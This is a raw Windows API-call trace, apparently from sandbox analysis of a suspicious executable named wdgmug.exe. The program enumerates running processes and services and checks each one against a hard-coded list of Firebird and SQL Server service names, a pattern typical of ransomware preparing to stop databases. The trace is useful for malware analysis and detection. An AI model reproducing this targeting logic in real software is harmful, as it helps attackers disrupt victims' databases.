th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0305.822] lstrlenW (lpString="audiodg.exe") returned 11 [0305.822] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0305.823] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0305.823] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0305.823] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0305.823] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0305.824] lstrlenW (lpString="Memory Compression") returned 18 [0305.824] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0305.825] lstrlenW (lpString="sihost.exe") returned 10 [0305.825] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.825] lstrlenW (lpString="svchost.exe") returned 11 [0305.826] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0305.826] lstrlenW (lpString="taskhostw.exe") returned 13 [0305.826] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x39, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0305.827] lstrlenW (lpString="explorer.exe") returned 12 [0305.827] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0305.827] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0305.828] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0305.828] lstrlenW (lpString="SearchUI.exe") returned 12 [0305.828] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0305.829] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0305.829] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0305.830] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0305.830] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0305.831] lstrlenW (lpString="wdgmug.exe") returned 10 [0305.831] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0305.831] lstrlenW (lpString="cmd.exe") returned 7 [0305.831] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0305.832] lstrlenW (lpString="conhost.exe") returned 11 [0305.832] Process32NextW (in: hSnapshot=0x470, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0305.832] CloseHandle (hObject=0x470) returned 1 [0305.833] Sleep (dwMilliseconds=0x1f4) [0306.412] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a4e0 [0306.413] EnumServicesStatusExW (in: hSCManager=0x401a4e0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0306.413] GetLastError () returned 0xea [0306.413] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bc4) returned 0x4150d60 [0306.413] EnumServicesStatusExW (in: hSCManager=0x401a4e0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4150d60, cbBufSize=0x1bc4, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4150d60, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0306.415] CloseServiceHandle (hSCObject=0x401a4e0) returned 1 [0306.418] lstrlenW (lpString="AppXSvc") returned 7 [0306.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0306.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0306.418] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0306.418] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0306.418] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0306.418] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0306.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0306.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0306.418] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0306.418] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0306.418] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0306.418] lstrlenW (lpString="Audiosrv") returned 8 [0306.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0306.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0306.418] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0306.418] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0306.418] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0306.419] lstrlenW (lpString="BFE") returned 3 [0306.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0306.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0306.419] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0306.419] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0306.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0306.419] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0306.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0306.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0306.419] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0306.419] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0306.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0306.419] lstrlenW (lpString="CDPSvc") returned 6 [0306.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0306.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0306.420] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0306.420] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0306.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0306.420] lstrlenW (lpString="ClickToRunSvc") returned 13 [0306.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0306.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0306.420] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0306.420] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0306.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0306.420] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0306.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0306.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0306.420] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0306.420] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0306.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0306.420] lstrlenW (lpString="CryptSvc") returned 8 [0306.420] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0306.420] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0306.420] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0306.420] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0306.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0306.420] lstrlenW (lpString="DcomLaunch") returned 10 [0306.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0306.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0306.421] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0306.421] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0306.421] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0306.421] lstrlenW (lpString="DeviceAssociationService") returned 24 [0306.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0306.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0306.421] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0306.421] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0306.421] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0306.421] lstrlenW (lpString="Dhcp") returned 4 [0306.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0306.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0306.421] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0306.421] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0306.421] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0306.421] lstrlenW (lpString="Dnscache") returned 8 [0306.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0306.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0306.421] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0306.421] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0306.422] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0306.422] lstrlenW (lpString="DPS") returned 3 [0306.422] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0306.422] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0306.422] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0306.422] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0306.422] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0306.422] lstrlenW (lpString="DusmSvc") returned 7 [0306.422] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0306.422] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0306.422] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0306.422] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0306.422] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0306.422] lstrlenW (lpString="EventLog") returned 8 [0306.422] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0306.422] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0306.422] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0306.422] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0306.422] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0306.422] lstrlenW (lpString="EventSystem") returned 11 [0306.422] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0306.422] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0306.423] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0306.423] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0306.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0306.423] lstrlenW (lpString="FontCache") returned 9 [0306.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0306.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0306.423] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0306.423] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0306.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0306.423] lstrlenW (lpString="gpsvc") returned 5 [0306.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0306.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0306.423] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0306.423] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0306.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0306.423] lstrlenW (lpString="iphlpsvc") returned 8 [0306.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0306.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0306.423] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0306.423] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0306.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0306.424] lstrlenW (lpString="KeyIso") returned 6 [0306.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0306.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0306.424] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0306.424] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0306.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0306.424] lstrlenW (lpString="LanmanServer") returned 12 [0306.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0306.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0306.424] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0306.424] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0306.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0306.424] lstrlenW (lpString="LanmanWorkstation") returned 17 [0306.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0306.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0306.424] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0306.424] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0306.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0306.424] lstrlenW (lpString="lfsvc") returned 5 [0306.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0306.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0306.424] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0306.425] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0306.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0306.425] lstrlenW (lpString="lmhosts") returned 7 [0306.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0306.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0306.425] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0306.425] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0306.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0306.425] lstrlenW (lpString="LSM") returned 3 [0306.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0306.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0306.425] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0306.425] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0306.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0306.425] lstrlenW (lpString="MpsSvc") returned 6 [0306.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0306.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0306.425] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0306.425] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0306.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0306.425] lstrlenW (lpString="NcbService") returned 10 [0306.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0306.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0306.426] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0306.426] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0306.426] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0306.426] lstrlenW (lpString="netprofm") returned 8 [0306.426] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0306.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0306.426] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0306.426] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0306.426] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0306.426] lstrlenW (lpString="NgcSvc") returned 6 [0306.426] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0306.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0306.426] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0306.426] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0306.426] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0306.426] lstrlenW (lpString="NlaSvc") returned 6 [0306.426] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0306.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0306.426] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0306.426] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0306.426] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0306.426] lstrlenW (lpString="nsi") returned 3 [0306.427] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0306.427] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0306.427] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0306.427] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0306.427] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0306.427] lstrlenW (lpString="PcaSvc") returned 6 [0306.427] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0306.427] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0306.427] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0306.427] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0306.427] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0306.427] lstrlenW (lpString="PlugPlay") returned 8 [0306.427] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0306.427] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0306.427] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0306.427] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0306.427] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0306.427] lstrlenW (lpString="Power") returned 5 [0306.427] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0306.427] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0306.427] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0306.427] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0306.427] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0306.427] lstrlenW (lpString="ProfSvc") returned 7 [0306.427] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0306.428] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0306.428] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0306.428] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0306.428] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0306.428] lstrlenW (lpString="RpcEptMapper") returned 12 [0306.428] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0306.428] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0306.428] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0306.428] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0306.428] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0306.428] lstrlenW (lpString="RpcSs") returned 5 [0306.428] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0306.428] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0306.428] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0306.428] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0306.428] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0306.428] lstrlenW (lpString="SamSs") returned 5 [0306.428] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0306.428] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0306.428] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0306.428] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0306.428] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0306.428] lstrlenW (lpString="Schedule") returned 8 [0306.428] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0306.428] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0306.428] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0306.429] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0306.429] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0306.429] lstrlenW (lpString="SecurityHealthService") returned 21 [0306.429] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0306.429] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0306.429] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0306.429] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0306.429] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0306.429] lstrlenW (lpString="SENS") returned 